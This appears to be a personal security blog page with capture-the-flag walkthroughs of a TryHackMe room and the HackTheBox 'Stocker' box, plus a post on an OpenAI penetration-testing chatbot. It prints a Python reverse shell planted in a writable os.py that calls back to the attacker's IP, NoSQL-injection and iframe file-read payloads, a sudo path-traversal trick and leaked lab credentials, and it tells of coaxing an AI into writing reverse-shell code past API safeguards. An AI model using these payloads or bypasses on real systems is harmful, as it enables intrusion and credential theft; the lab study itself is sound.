[+] Deleted ../gLvyBKxzbo
[*] Meterpreter session 1 opened (10.19.10.150:4444 -> 10.10.13.248:52428) at 2023-11-12 10:28:20 +0900


meterpreter > ls
[-] stdapi_fs_stat: Operation failed: 1
meterpreter > cd ..
meterpreter > ls
Listing: /var/www/html/wp-content/plugins
=========================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
042775/rwxrwxr-x  4096  dir   2020-01-11 06:00:27 +0900  akismet
100664/rw-rw-r--  2255  fil   2013-05-23 06:08:40 +0900  hello.php
100664/rw-rw-r--  28    fil   2014-06-06 00:59:14 +0900  index.php
042755/rwxr-xr-x  4096  dir   2020-01-10 22:35:54 +0900  user-role-editor

meterpreter > whoami
[-] Unknown command: whoami
meterpreter > who
[-] Unknown command: who
meterpreter > w
[-] Unknown command: w
meterpreter > shell
Process 2519 created.
Channel 0 created.

python -c 'import pty; pty.spawn("/bin/bash")'
www-data@jack:/var/www/html/wp-content/plugins$ 

First Flag

Now navigate to the user home:

www-data@jack:/home/jack$ ls
ls
reminder.txt  user.txt
www-data@jack:/home/jack$ cat user.txt
cat user.txt
0052f7829e48752f2e7bf50f1231548a

Ok, we got the user flag.

Let’s enumerate for something we can use to pivot or privesc.

Serve linpeas.sh from a quick Python web server on the attacker box:

```bash
kali@kalia  ~/curr/source  cp /home/kali/Downloads/linpeas.sh .
kali@kalia  ~/curr/source  python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …
10.10.13.248 - - [12/Nov/2023 10:35:54] "GET /linpeas.sh HTTP/1.1" 200 -

```

Now on the Victim:

```bash
cd /dev/shm
www-data@jack:/dev/shm$ wget http://10.19.10.150/linpeas.sh
wget http://10.19.10.150/linpeas.sh
--2023-11-11 19:35:54-- http://10.19.10.150/linpeas.sh
Connecting to 10.19.10.150:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 848317 (828K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh 100%[===================>] 828.43K 417KB/s in 2.0s

2023-11-11 19:35:57 (417 KB/s) - 'linpeas.sh' saved [848317/848317]

www-data@jack:/dev/shm$ ls
ls
linpeas.sh
www-data@jack:/dev/shm$ chmod +x linpeas.sh
chmod +x linpeas.sh

```

First User Access

After running it, linpeas flags a private key in /var/backups that is readable (and writable) by everyone:

```bash
╔══════════╣ Analyzing SSH Files (limit 70)

-rwxrwxrwx 1 root root 1675 Jan 10 2020 /var/backups/id_rsa
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----

```

Copy the key to the attacker box and restrict its permissions (ssh refuses a private key that is readable by group or others):

 ✘ kali@kalia  ~/curr  cat ssh/id_rsa 
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----

kali@kalia  ~/curr/ssh  chmod 0600 ssh/id_rsa

Now use it to log in as jack and get a proper shell:

kali@kalia  ~/curr  ssh -i ssh/id_rsa jack@$IP                  
The authenticity of host '10.10.13.248 (10.10.13.248)' can't be established.
ED25519 key fingerprint is SHA256:91RPPbrI5UuL0FaDNrDEVlL+bIOB9YABCTtC3ttyW1U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.13.248' (ED25519) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

143 packages can be updated.
92 updates are security updates.


Last login: Mon Nov 16 14:27:49 2020 from 10.11.12.223
jack@jack:~$ 

Second Enumeration

I run Linpeas again here as I am now properly logged in as the Jack user:

╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses                                     
/home/jack/bin:/home/jack/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin


╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2                  

[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin

[..]

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/opt/statuscheck/output.log                                                                                                 
/var/log/auth.log
/var/log/apache2/access.log
/var/log/syslog
/home/jack/.config/lxc/client.crt
/home/jack/.config/lxc/client.key
/home/jack/.gnupg/gpg.conf
/home/jack/.gnupg/trustdb.gpg
/home/jack/.gnupg/pubring.gpg

[..]

╔══════════╣ Analyzing SSH Files (limit 70)                                                                                 

-rw------- 1 jack jack 1675 Jan 10  2020 /home/jack/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----
-rw-r--r-- 1 jack jack 391 Jan 10  2020 /home/jack/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDF8FH0X1Xkbaye/VdprG/dUdsVnZVlHAbJT5qHqSiYF5oCV2vxI0rXHTC795eMuOtadVpg4RTZhSsfOf924Hda+bzHIDRPzH9ZtXaixZpU5p+Q9K9ilXg51Ct1GhLc8Q5dGdL4Kc5MCA9ajb7F8fVd6V0XD1eJiumtO6CbAJxgO4FkHevOZYDyw9aMuOzrHM0rbpFBBuj3NrHB8R2Nndqf0meAknubSu0X28p4JF87VXyx3+3WW73oqqfgVlRNdAUQZ8Bi6kbpve+lHCqYjrLZWMrkzGUyYR3A/yjGYpHhdGq9IrXyblvLPxlS7VF8HxSD+kor1VVuT1AVZutXgTcX jack@jack
-rwxrwxrwx 1 root root 1675 Jan 10  2020 /var/backups/id_rsa
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----



-rw-rw-r-- 1 jack jack 391 Jan 10  2020 /home/jack/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDF8FH0X1Xkbaye/VdprG/dUdsVnZVlHAbJT5qHqSiYF5oCV2vxI0rXHTC795eMuOtadVpg4RTZhSsfOf924Hda+bzHIDRPzH9ZtXaixZpU5p+Q9K9ilXg51Ct1GhLc8Q5dGdL4Kc5MCA9ajb7F8fVd6V0XD1eJiumtO6CbAJxgO4FkHevOZYDyw9aMuOzrHM0rbpFBBuj3NrHB8R2Nndqf0meAknubSu0X28p4JF87VXyx3+3WW73oqqfgVlRNdAUQZ8Bi6kbpve+lHCqYjrLZWMrkzGUyYR3A/yjGYpHhdGq9IrXyblvLPxlS7VF8HxSD+kor1VVuT1AVZutXgTcX jack@jack

I tried both keys as jack and as root. They are in fact the same key: same size, same date, same contents, and its public half is in jack’s authorized_keys, so it logs in as jack without a password. Root prompts for a password, so the key isn’t authorized there. The real finding is that a copy of jack’s private key sits in /var/backups with mode 0777.

Checking out his home directory I saw 1 other interesting file:

jack@jack:~$ cat reminder.txt 

Please read the memo on linux file permissions, last time your backups almost got us hacked! Jack will hear about this when he gets back.

Ok, so I’m being pointed to backups again.

The files modified in the last 5 minutes are worth a look. This one stands out because it is outside the usual log locations:

/opt/statuscheck/output.log

The room says to hack Python to gain root, so this is the most likely vector:

jack@jack:~$ cd /opt/statuscheck/
jack@jack:/opt/statuscheck$ ls
checker.py  output.log
jack@jack:/opt/statuscheck$ cat output.log 

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 00:44:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 00:46:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8
[..]

So that Python script runs on a schedule (the log entries are two minutes apart), and according to the room it runs as root. If a root job imports something we can write to, that’s our way in.

Checking out that /var/backups directory:

www-data@jack:/dev/shm$ ls -al /var/backups
ls -al /var/backups
total 776
drwxr-xr-x  2 root root     4096 Jan 10  2020 .
drwxr-xr-x 14 root root     4096 Jan  9  2020 ..
-rw-r--r--  1 root root    40960 Jan  9  2020 alternatives.tar.0
-rw-r--r--  1 root root     9931 Jan  9  2020 apt.extended_states.0
-rw-r--r--  1 root root      713 Jan  8  2020 apt.extended_states.1.gz
-rw-r--r--  1 root root       11 Jan  8  2020 dpkg.arch.0
-rw-r--r--  1 root root       43 Jan  8  2020 dpkg.arch.1.gz
-rw-r--r--  1 root root      437 Jan  8  2020 dpkg.diversions.0
-rw-r--r--  1 root root      202 Jan  8  2020 dpkg.diversions.1.gz
-rw-r--r--  1 root root      207 Jan  9  2020 dpkg.statoverride.0
-rw-r--r--  1 root root      129 Jan  8  2020 dpkg.statoverride.1.gz
-rw-r--r--  1 root root   552673 Jan  9  2020 dpkg.status.0
-rw-r--r--  1 root root   129487 Jan  8  2020 dpkg.status.1.gz
-rw-------  1 root root      802 Jan  9  2020 group.bak
-rw-------  1 root shadow    672 Jan  9  2020 gshadow.bak
-rwxrwxrwx  1 root root     1675 Jan 10  2020 id_rsa
-rw-------  1 root root     1626 Jan  9  2020 passwd.bak
-rw-------  1 root shadow    969 Jan  9  2020 shadow.bak

passwd.bak and shadow.bak would be valuable, but they are 0600 and root-only. id_rsa, the key linpeas found, is a different story: owned by root but mode 0777, readable and writable by everyone.

Linpeas suggests we can write to quite a lot. Let’s check which groups jack is in:

jack@jack:/opt/statuscheck$ groups
jack adm cdrom dip plugdev lpadmin sambashare family

The first few are standard Ubuntu desktop groups; family is custom, so let’s see what it owns:

jack@jack:/opt/statuscheck$ find / -group family 2>/dev/null
/usr/lib/python2.7/_threading_local.py
/usr/lib/python2.7/plistlib.pyc
/usr/lib/python2.7/stringprep.py
/usr/lib/python2.7/ihooks.pyc
/usr/lib/python2.7/weakref.py
/usr/lib/python2.7/sgmllib.pyc
[.. 200 more..]

/usr/lib/python2.7/os.py
/usr/lib/python2.7/posixpath.py
/usr/lib/python2.7/io.pyc
/usr/lib/python2.7/traceback.pyc
/usr/lib/python2.7/asyncore.py
/usr/lib/python2.7/popen2.py
/usr/lib/python2.7/zipfile.pyc
/usr/lib/python2.7/doctest.pyc
/usr/lib/python2.7/getpass.pyc
/usr/lib/python2.7/smtplib.py
/etc/python2.7/sitecustomize.py

Wow.. not good. These are Python 2.7 standard-library modules, and every one of them is group-owned by family. Group ownership only matters if the group-write bit is set, but the edit to os.py below goes through, so it is. Any root process that starts python2 will import our code. /etc/python2.7/sitecustomize.py is in the list too and is imported automatically at interpreter start-up, so it would work just as well. The room title makes sense now. All too easy.

PrivEsc

Ok let’s grab a Python reverse shell:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python

And I use this one:

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.19.10.150",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

I put that in the bottom of the os.py file:

try:
    _copy_reg.pickle(statvfs_result, _pickle_statvfs_result,
                     _make_statvfs_result)
except NameError: # statvfs_result may not exist
    pass

# -- My treacherous additions mohaha
import socket,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.19.10.150",4444))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/sh")

I modified it to drop the import of os (we are inside os.py, and dup2 is already in the module’s namespace), removed the os. prefix from the dup2 calls, split it over several lines for readability, and put in my own IP and port for the callback. Keep it valid Python 2, since that is the interpreter that will import it.

Next start a listener and wait:

✘ kali@kalia  ~  ~/bin/revs 4444
Starting reverse shell on port 4444
python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z - Background shell
stty raw -echo; fg
export TERM=xterm
listening on [any] 4444 ...
connect to [10.19.10.150] from (UNKNOWN) [10.10.13.248] 52586
# whoami
whoami
root
# 

NOTE: If you have trouble, run python with no arguments as jack. The interpreter imports os at start-up, so any syntax error is reported with its line number in os.py. Once the import succeeds it will connect back to you as jack; kill that session, because we want the root job to connect instead.

Once it’s fixed, restart your reverse listener and wait for the root shell to connect.

Last Flag

# whoami
whoami
root
# ls
ls
root.txt
# cat root.txt
cat root.txt
b8b63a861cc09e853f29d8055d64bffb
# 

Anyway there we have it, we have our root shell and can get the flag.

Usernames:

jack              #wp user
wendy:changelater #wp user
danny             #wp user

Conclusion

This was a really fun room. Not your standard WordPress hack. I actually had to go through a few user lists, which I thought was lame. NOTE to CTF creators: you don’t make a room harder by putting the password further down a wordlist or adding it to something obscure. I went through the entire rockyou.txt and then tried some other ones I’ve created in the past for most common passwords, and that’s how I found wendy’s password. If anyone tries to use rockyou.txt, don’t bother, the password isn’t there.

The rest of the room was textbook, though a little harder than just linpeas, GTFOBins and done. It was still easy.

Initial Difficulty: 5/10
Overall Difficulty: 5/10
Fun Level: 8/10

HackTheBox – Stocker

HackTheBox

I started up an account recently on HackTheBox. Primarily because I’ve already done all the Active Directory related rooms on TryHackMe, but it’s another great place to learn and play.

This time I will give my walkthrough of a box on HackTheBox.com called Stocker. Overall I would rate this a Lower-Mid level box.

Initial Enumeration

------------------------------------------------------------
        Threader 3000 - Multi-threaded Port Scanner          
                       Version 1.0.7                    
                   A project by The Mayor               
------------------------------------------------------------
Enter your target IP address or URL here: 10.10.11.196
------------------------------------------------------------
Scanning target 10.10.11.196
Time started: 2023-01-30 12:07:11.973696
------------------------------------------------------------
Port 22 is open
Port 80 is open
Port scan completed in 0:01:05.023631
------------------------------------------------------------
Threader3000 recommends the following Nmap scan:
************************************************************
nmap -p22,80 -sV -sC -T4 -Pn -oA 10.10.11.196 10.10.11.196
************************************************************
Would you like to run Nmap or quit to terminal?
------------------------------------------------------------
1 = Run suggested Nmap scan
2 = Run another Threader3000 scan
3 = Exit to terminal
------------------------------------------------------------
Option Selection: 1
nmap -p22,80 -sV -sC -T4 -Pn -oA 10.10.11.196 10.10.11.196
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 12:08 JST
Nmap scan report for 10.10.11.196
Host is up (0.19s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3d12971d86bc161683608f4f06e6d54e (RSA)
|   256 7c4d1a7868ce1200df491037f9ad174f (ECDSA)
|_  256 dd978050a5bacd7d55e827ed28fdaa3b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://stocker.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.89 seconds
------------------------------------------------------------
Combined scan completed in 0:01:40.621978

Port 80 is open.

Enumerating further found no robots.txt.
Port 80 returns a 302 redirect to http://stocker.htb (see the http-title line in the nmap output).

Added stocker.htb to /etc/hosts

Ran gobuster and found a dev.stocker.htb which I also added to /etc/hosts.

I found a bug against the current version of nginx 1.18.0 that this is using, but for some reason it wasn’t working properly and the machine became unstable so I requested a reboot.

Burpsuite and NOSQL Injection

I decided to enumerate a little further and found, with Burp Suite, that the login form is vulnerable to NoSQL injection.

BurpSuite Capture Login

Changing the Content-Type to application/json and sending MongoDB operators in place of the string fields:

{"username":{"$ne":"corisan"},"password":{"$ne":"corisan"}}
BurpSuite NoSQL Injection Testing

After forwarding the request from Burp Suite we get a login, because the query the server builds, {username: {$ne: "corisan"}, password: {$ne: "corisan"}}, matches the first user whose fields differ from those values, and the site now shows us items. If we click on an item, add it to the cart, and put an iframe into the captured checkout request, the server-side rendering will show us /etc/passwd and give us a list of users.
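Why that JSON body logs in, as an added example that is not code from the original post: a small evaluator for the two MongoDB operators that matter, the vulnerable lookup (request JSON copied straight into the query, which is what the login effectively did) and a hardened version that only lets plain strings reach the query. USERS is a constructed table; the real application’s field names and data are not known from the post, and angoose is the only username it confirms.

```python
"""Added example: NoSQL operator injection against a findOne-style login.
Constructed user table; not code from the original post."""
import re

# Constructed sample data.
USERS = [
    {"username": "angoose", "password": "correct horse battery staple"},
    {"username": "corisan", "password": "hunter2"},
]


def field_matches(value, condition):
    """Evaluate one field the way MongoDB does for {$ne, $regex} or plain equality."""
    if isinstance(condition, dict) and condition and all(k.startswith("$") for k in condition):
        for op, arg in condition.items():
            if op == "$ne":
                ok = value != arg
            elif op == "$regex":
                ok = isinstance(value, str) and re.search(arg, value) is not None
            else:
                raise ValueError("operator not modelled: " + op)
            if not ok:
                return False
        return True
    return value == condition


def find_one(collection, query):
    """First document satisfying every field condition, like collection.findOne()."""
    for doc in collection:
        if all(field_matches(doc.get(field), cond) for field, cond in query.items()):
            return doc
    return None


def vulnerable_login(body):
    """db.users.findOne({username: req.body.username, password: req.body.password})
    with the parsed JSON body passed through untouched."""
    return find_one(USERS, {"username": body.get("username"), "password": body.get("password")})


def hardened_login(body):
    """Same lookup, but an operator object in either field is rejected outright."""
    username, password = body.get("username"), body.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        return None
    return find_one(USERS, {"username": username, "password": password})


if __name__ == "__main__":
    bypass = {"username": {"$ne": "corisan"}, "password": {"$ne": "corisan"}}
    print("vulnerable:", vulnerable_login(bypass))
    print("hardened:  ", hardened_login(bypass))
```

The $regex case is the one to remember when the password field is not the target: an attacker can extract a stored value character by character with {"$regex": "^a"}, {"$regex": "^ab"} and so on, which is why the hardened version refuses objects rather than trying to strip particular operators. It also still compares plaintext passwords, which the real fix would replace with a hash comparison.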

BurpSuite – Post Forward get Login

Now we Add to Basket and Checkout

Post Login Checkout Basket

Embedding an iframe with path to the passwd file:

"title":"<iframe src=file:///etc/passwd height=500px width=500px></iframe>",
Embed File in an iFrame before submitting via BurpSuite

Opening the _id returned by the checkout at /api/po/<ID> shows the rendered order; the iframe is rendered server-side, so what comes back is the contents of the /etc/passwd file:

Post Submit via BurpSuite gets us contents of /etc/passwd file.

Now we have a possible username, angoose. Remember we are looking for a non-system account with a real shell such as /bin/bash; the others show /bin/false or /usr/sbin/nologin, so they are no use for SSH.

Now we can use the same trick to grab the site’s index.js and look for a password.

BurpSuite iFrame injection to get contents of index.js
After Submitting Item w/ modified iFrame in BurpSuite we get the content of index.js as the Item

So now we have the password too, IHeardPassphrasesArePrettySecure, thanks to the developer hard-coding it in the script instead of keeping it in a dotenv file or a secrets store.

As an aside, a trick developers use is to obfuscate application passwords: base64-encode the password, store that in a file, and have the application read it and base64 -d it into a variable. This keeps the password out of the script, but base64 is encoding, not encryption, so it only defeats a casual grep. One of the first things I like to do when enumerating for information and passwords is to look for base64-encoded files on the system.

I wrote a tool to help you scan for these kinds of base64 encoded files here on my github: https://github.com/c0ri/b64scan

SSH and First Flag

ssh angoose@10.10.11.196                                   
The authenticity of host '10.10.11.196 (10.10.11.196)' can't be established.
ED25519 key fingerprint is SHA256:jqYjSiavS/WjCMCrDzjEo7AcpCFS07X3OLtbGHo/7LQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.196' (ED25519) to the list of known hosts.
angoose@10.10.11.196's password: 

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

angoose@stocker:~$ who
angoose  pts/0        2023-01-30 04:31 (10.10.14.11)
angoose@stocker:~$ id
uid=1001(angoose) gid=1001(angoose) groups=1001(angoose)
angoose@stocker:~$ ls
user.txt
angoose@stocker:~$ cat user.txt
bce30eb254c192b18a0390a2d121822d

Running sudo -l shows we may run /usr/bin/node as root, but only with a script path under /usr/local/scripts. First, let’s throw together a little .js script to read /root/root.txt and see if we can get the system flag that way.

// -- getroot.js
const fs = require('fs');

fs.readFile('/root/root.txt', 'utf8', (err, data) => {
        if (err) {
                console.error(err);
                return;
        }
        console.log(data);
});

Now we run it, using a trick to escape /usr/local/scripts: the sudo rule matches the argument as text, not as a resolved path, so /usr/local/scripts/../../../home/angoose/ still begins with the allowed directory while actually pointing at our home.

angoose@stocker:~$ sudo /usr/bin/node /usr/local/scripts/../../../home/angoose/getroot.js 
7383fc4bc3af1080ba3815cd4beba4d9
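Why the ../ trick works against the sudo rule, and the check that would have stopped it, as an added example that is not code from the original post. sudo compares the argument against the rule’s wildcard as a string, so a pattern like /usr/local/scripts/* is satisfied by anything that merely starts with /usr/local/scripts/; a guard that canonicalises the path before the containment check sees the traversal. The pattern is an assumption: the post only says node may run scripts from /usr/local/scripts and the exact sudoers line is not shown.

```python
"""Added example: textual glob match versus canonicalised containment check.
RULE_PATTERN is an assumed sudoers argument glob; not code from the original post."""
import fnmatch
import posixpath

RULE_PATTERN = "/usr/local/scripts/*"   # assumed sudoers argument glob
ALLOWED_DIR = "/usr/local/scripts"


def allowed_by_glob(argument, pattern=RULE_PATTERN):
    """Textual wildcard match; '*' also matches '/', which is what lets ../ through."""
    return fnmatch.fnmatchcase(argument, pattern)


def inside_allowed_dir(argument, base=ALLOWED_DIR):
    """Collapse '..' and '//' before the containment check.  On a live system add
    os.path.realpath so symlinks are resolved too; posixpath keeps this demo
    independent of the host OS."""
    resolved = posixpath.normpath(argument)
    base = base.rstrip("/")
    return resolved == base or resolved.startswith(base + "/")


def verdict(argument):
    """What the rule thinks versus where the path really points."""
    return {"glob": allowed_by_glob(argument), "canonical": inside_allowed_dir(argument)}


if __name__ == "__main__":
    for arg in ["/usr/local/scripts/report.js",
                "/usr/local/scripts/../../../home/angoose/getroot.js",
                "/usr/local/scriptsX/evil.js"]:
        print(arg, verdict(arg))
```

Note the third case: a naive string prefix check without the trailing slash would also accept /usr/local/scriptsX/evil.js, so the containment check compares against base plus a separator. The practical fix in sudoers is to list the exact scripts rather than a wildcard, or to point the rule at a wrapper that does this canonicalisation itself.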

Review

I had some initial challenges with not being able to load the site. After that I had some instability, which forced me to request a restart of the box after running an nginx exploit against it.

I finally had better luck just doing some poking around with Burpsuite. Once I got on the box it was quite easy to get the system flag.

Fun Level: 7/10
Initial Difficulty: 4/10
Secondary Difficulty: 4/10

Like what I do? Buy me a coffee! https://www.buymeacoffee.com/c0ri

Isis OpenAI Chatbot for Penetration Testing

It seems that I will be having some more time to work on my personal projects and also working towards my OSCP because I quit my job. I will be looking for a new gig after some needed time off, but in the meantime I’m excited to continue my studies with Penetration Testing as well as doing some coding projects that I’ve been wanting to either finish or start.

I’ve added some code to the Isis OpenAI Chatbot for Penetration Testing. This is more how I envisioned it working as a hands-free way to interact with me. There are still some quirks going on with the OpenAI that I’ve found and I will touch on these.

First, as I mentioned, I named this project after the Isis character from the Star Trek episode Assignment: Earth, an AI that was able to work with a character called Gary Seven to save the planet. In that light, I really added a lot of fluff to the AI code. You can tweak it to your liking. I’d also add that some of the code, such as the history and training questions, can and probably should be tweaked. If you re-inject those with every question, you will probably eat up tokens and money fast. So please be aware of that.

For the next things I want to do, I need to add some ability for Isis to save things like injections, snippets and code into either files or into my working flow. To be honest, when I started this project I was so shocked that Isis actually generated some totally unique reverse shell code for me in PHP. I had thought maybe it would look it up on the internet and post me something. It actually coded something! Interestingly, I could not get the same result using the playground, as the public API seems to block ‘dangerous’ code. I’m not sure how concessions would be made for legitimate penetration testers.

Isis OpenAI Chatbot for Penetration Testing is something really cool. As far as I know it was the first of its kind. This was released and within weeks I saw other cool apps from others follow, like GitHub’s Copilot, which to my mind is super cool and similar to how I envisioned Isis to begin with, except I would like the choice to save code/snippets/scripts into places of my choosing.

Anyway, play around with it and see what you think. If you have any suggestions for improvements or wish to contribute, then go for it. You can find the code on my Github here:

https://github.com/c0ri/isis